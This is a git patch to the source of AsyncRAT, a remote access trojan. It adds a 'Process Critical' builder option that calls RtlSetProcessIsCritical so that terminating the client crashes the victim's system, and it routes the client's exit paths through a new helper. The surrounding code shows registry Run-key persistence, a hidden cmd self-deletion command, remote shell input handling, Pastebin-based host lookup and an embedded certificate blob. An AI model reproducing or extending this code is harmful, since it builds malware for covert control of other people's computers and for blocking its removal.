From 1846a77b5a77103e8d9f0992d021d682dbf9159c Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Mon, 20 May 2019 18:34:33 +0300 Subject: [PATCH] Update -Added process critical - thanks to MrDevBot -Add a method to handle client's exit -Minor bugs fixed --- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 7 ++- .../Forms/FormBuilder.Designer.cs | 36 ++++++++++++++-- .../AsyncRAT-Sharp/Forms/FormBuilder.cs | 5 ++- AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 2 +- AsyncRAT-C#/Client/Client.csproj | 1 + AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs | 6 ++- .../Client/Handle Packet/HandleUninstall.cs | 43 +++++++++---------- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 6 +-- AsyncRAT-C#/Client/Helper/Methods.cs | 8 ++++ AsyncRAT-C#/Client/Helper/ProcessCritical.cs | 32 ++++++++++++++ AsyncRAT-C#/Client/Install/NormalStartup.cs | 3 +- AsyncRAT-C#/Client/Program.cs | 3 ++ AsyncRAT-C#/Client/Settings.cs | 7 ++- 13 files changed, 120 insertions(+), 39 deletions(-) create mode 100644 AsyncRAT-C#/Client/Helper/ProcessCritical.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c8abfc3..0d77e0f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -77,7 +77,10 @@ namespace AsyncRAT_Sharp this.Text = $"{Settings.Version}"; #if DEBUG Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String("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")); - Settings.Port = "6606"; + listener = new Listener(); + Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect)); + thread.IsBackground = true; + thread.Start(6606); #else using (FormPorts portsFrm = new FormPorts()) { @@ -106,7 +109,7 @@ namespace AsyncRAT_Sharp listener = new Listener(); Thread thread = new Thread(new ParameterizedThreadStart(listener.Connect)); thread.IsBackground = true; - thread.Start(Convert.ToInt32(port.ToString().Trim())); + thread.Start(Convert.ToInt16(port.ToString().Trim())); } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs index 5b717cf..733026f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.Designer.cs @@ -46,6 +46,7 @@ namespace AsyncRAT_Sharp.Forms this.label3 = new System.Windows.Forms.Label(); this.label4 = new System.Windows.Forms.Label(); this.groupBox3 = new System.Windows.Forms.GroupBox(); + this.chkBdos = new System.Windows.Forms.CheckBox(); this.txtMutex = new System.Windows.Forms.TextBox(); this.label5 = new System.Windows.Forms.Label(); this.chkAnti = new System.Windows.Forms.CheckBox(); @@ -54,6 +55,7 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1 = new System.Windows.Forms.TabPage(); this.tabPage2 = new System.Windows.Forms.TabPage(); this.tabPage3 = new System.Windows.Forms.TabPage(); + this.pictureBox1 = new System.Windows.Forms.PictureBox(); this.groupBox1.SuspendLayout(); this.groupBox2.SuspendLayout(); this.groupBox3.SuspendLayout(); @@ -61,11 +63,12 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1.SuspendLayout(); this.tabPage2.SuspendLayout(); this.tabPage3.SuspendLayout(); + ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); this.SuspendLayout(); // // button1 // - this.button1.Location = new System.Drawing.Point(6, 236); + this.button1.Location = new System.Drawing.Point(3, 302); this.button1.Name = "button1"; this.button1.Size = new System.Drawing.Size(440, 49); this.button1.TabIndex = 0; @@ -225,20 +228,32 @@ namespace AsyncRAT_Sharp.Forms // // groupBox3 // + this.groupBox3.Controls.Add(this.pictureBox1); + this.groupBox3.Controls.Add(this.chkBdos); this.groupBox3.Controls.Add(this.txtMutex); this.groupBox3.Controls.Add(this.label5); this.groupBox3.Controls.Add(this.chkAnti); this.groupBox3.Location = new System.Drawing.Point(6, 17); this.groupBox3.Name = "groupBox3"; - this.groupBox3.Size = new System.Drawing.Size(440, 174); + this.groupBox3.Size = new System.Drawing.Size(440, 229); this.groupBox3.TabIndex = 9; this.groupBox3.TabStop = false; this.groupBox3.Text = "MISC"; // + // chkBdos + // + this.chkBdos.AutoSize = true; + this.chkBdos.Location = new System.Drawing.Point(21, 82); + this.chkBdos.Name = "chkBdos"; + this.chkBdos.Size = new System.Drawing.Size(143, 24); + this.chkBdos.TabIndex = 12; + this.chkBdos.Text = "Process Critical"; + this.chkBdos.UseVisualStyleBackColor = true; + // // txtMutex // this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged)); - this.txtMutex.Location = new System.Drawing.Point(106, 98); + this.txtMutex.Location = new System.Drawing.Point(106, 165); this.txtMutex.Name = "txtMutex"; this.txtMutex.Size = new System.Drawing.Size(271, 26); this.txtMutex.TabIndex = 11; @@ -247,7 +262,7 @@ namespace AsyncRAT_Sharp.Forms // label5 // this.label5.AutoSize = true; - this.label5.Location = new System.Drawing.Point(14, 102); + this.label5.Location = new System.Drawing.Point(14, 169); this.label5.Name = "label5"; this.label5.Size = new System.Drawing.Size(52, 20); this.label5.TabIndex = 10; @@ -308,6 +323,16 @@ namespace AsyncRAT_Sharp.Forms this.tabPage3.Text = "Misc"; this.tabPage3.UseVisualStyleBackColor = true; // + // pictureBox1 + // + this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.pictureBox1.Location = new System.Drawing.Point(181, 74); + this.pictureBox1.Name = "pictureBox1"; + this.pictureBox1.Size = new System.Drawing.Size(32, 32); + this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize; + this.pictureBox1.TabIndex = 13; + this.pictureBox1.TabStop = false; + // // FormBuilder // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); @@ -329,6 +354,7 @@ namespace AsyncRAT_Sharp.Forms this.tabPage1.ResumeLayout(false); this.tabPage2.ResumeLayout(false); this.tabPage3.ResumeLayout(false); + ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); this.ResumeLayout(false); } @@ -359,5 +385,7 @@ namespace AsyncRAT_Sharp.Forms private System.Windows.Forms.TabPage tabPage1; private System.Windows.Forms.TabPage tabPage2; private System.Windows.Forms.TabPage tabPage3; + private System.Windows.Forms.CheckBox chkBdos; + private System.Windows.Forms.PictureBox pictureBox1; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 72e2941..0aa920c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -147,6 +147,9 @@ namespace AsyncRAT_Sharp.Forms if (operand == "%Serversignature%") methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); + if (operand == "%BDOS%") + methodDef.Body.Instructions[i].Operand = chkBdos.Checked.ToString().ToLower(); + if (operand == "%Pastebin%") if (chkPastebin.Checked) methodDef.Body.Instructions[i].Operand = aes.Encrypt(txtPastebin.Text); @@ -158,7 +161,7 @@ namespace AsyncRAT_Sharp.Forms } } } - + } private void CheckBox2_CheckedChanged(object sender, EventArgs e) diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 2ef0358..2e9aa6c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -16,6 +16,6 @@ namespace AsyncRAT_Sharp public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static X509Certificate2 ServerCertificate; - public static readonly string Version = "AsyncRAT 0.4.8B"; + public static readonly string Version = "AsyncRAT 0.4.8C"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index c2881c5..4e6c1a4 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -105,6 +105,7 @@ FormChat.cs + diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs index 4204720..0cdf8d5 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -1,4 +1,5 @@ -using Microsoft.Win32; +using Client.Helper; +using Microsoft.Win32; using System; using System.Collections.Generic; using System.Diagnostics; @@ -6,6 +7,7 @@ using System.IO; using System.Linq; using System.Security.Principal; using System.Text; +using System.Windows.Forms; namespace Client.Handle_Packet { @@ -28,7 +30,7 @@ namespace Client.Handle_Packet } }; proc.Start(); - Environment.Exit(0); + Methods.ClientExit(); } catch { } } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index ebfe442..342e6fc 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs @@ -10,14 +10,14 @@ using System.Text; namespace Client.Handle_Packet { - public class HandleUninstall + public class HandleUninstall { public HandleUninstall() { - if (Convert.ToBoolean(Settings.Install)) + if (Convert.ToBoolean(Settings.Install)) + { + try { - try - { if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); else @@ -34,25 +34,24 @@ namespace Client.Handle_Packet } } catch { } - } - ProcessStartInfo Del = null; - try + } + ProcessStartInfo Del = null; + try + { + Del = new ProcessStartInfo() { - Del = new ProcessStartInfo() - { - Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"", - WindowStyle = ProcessWindowStyle.Hidden, - CreateNoWindow = true, - FileName = "cmd.exe" - }; - } - catch { } - finally - { - Methods.CloseMutex(); - Process.Start(Del); - Environment.Exit(0); - } + Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Process.GetCurrentProcess().MainModule.FileName + "\"", + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + FileName = "cmd.exe" + }; + } + catch { } + finally + { + Process.Start(Del); + Methods.ClientExit(); + } } } } diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 75fc7af..d4846b7 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -85,7 +85,7 @@ namespace Client.Handle_Packet ClientSocket.Client.Dispose(); } catch { } - Environment.Exit(0); + Methods.ClientExit(); break; } @@ -98,7 +98,7 @@ namespace Client.Handle_Packet } catch { } Process.Start(Application.ExecutablePath); - Environment.Exit(0); + Methods.ClientExit(); break; } @@ -270,7 +270,7 @@ namespace Client.Handle_Packet case "shellWriteInput": { if (HandleShell.ProcessShell != null) - HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString); + HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString); break; } diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs index f166be1..65bdcd2 100644 --- a/AsyncRAT-C#/Client/Helper/Methods.cs +++ b/AsyncRAT-C#/Client/Helper/Methods.cs @@ -43,5 +43,13 @@ namespace Client.Helper _appMutex = null; } } + + public static void ClientExit() + { + if (Convert.ToBoolean(Settings.BDOS)) + ProcessCritical.Exit(); + CloseMutex(); + Environment.Exit(0); + } } } diff --git a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs new file mode 100644 index 0000000..640af11 --- /dev/null +++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs @@ -0,0 +1,32 @@ +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; + +namespace Client.Helper +{ + public static class ProcessCritical + { + public static void Set() + { + try + { + Process.EnterDebugMode(); + RtlSetProcessIsCritical(1, 0, 0); + } + catch { } + } + public static void Exit() + { + try + { + RtlSetProcessIsCritical(0, 0, 0); + } + catch { } + } + + #region "Native Methods" + [DllImport("ntdll.dll", SetLastError = true)] + private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3); + #endregion + } +} diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index 6f0b62a..7749179 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -69,9 +69,8 @@ namespace Client.Install WindowStyle = ProcessWindowStyle.Hidden }); } - Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); - Environment.Exit(0); + Methods.ClientExit(); } } catch (Exception ex) diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index 6c353ca..ef1b9e8 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -34,6 +34,9 @@ namespace Client if (Convert.ToBoolean(Settings.Install)) NormalStartup.Install(); + if (Convert.ToBoolean(Settings.BDOS)) + ProcessCritical.Set(); + #if DEBUG ClientSocket.InitializeClient(); #else diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index ff2d5f3..5b2ff84 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -12,7 +12,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.8d"; + public static string Version = "AsyncRAT 0.4.9C"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Key = "NYAN CAT"; @@ -23,10 +23,12 @@ namespace Client public static string Anti = "false"; public static Aes256 aes256 = new Aes256(Key); public static string Pastebin = "null"; + public static string BDOS = "false"; + #else public static string Ports = "%Ports%"; public static string Hosts = "%Hosts%"; - public static string Version = "AsyncRAT 0.4.9B"; + public static string Version = "AsyncRAT 0.4.9C"; public static string Install = "%Install%"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string Key = "%Key%"; @@ -37,6 +39,7 @@ namespace Client public static readonly string Anti = "%Anti%"; public static Aes256 aes256; public static string Pastebin = "%Pastebin%"; + public static string BDOS = "%BDOS%"; #endif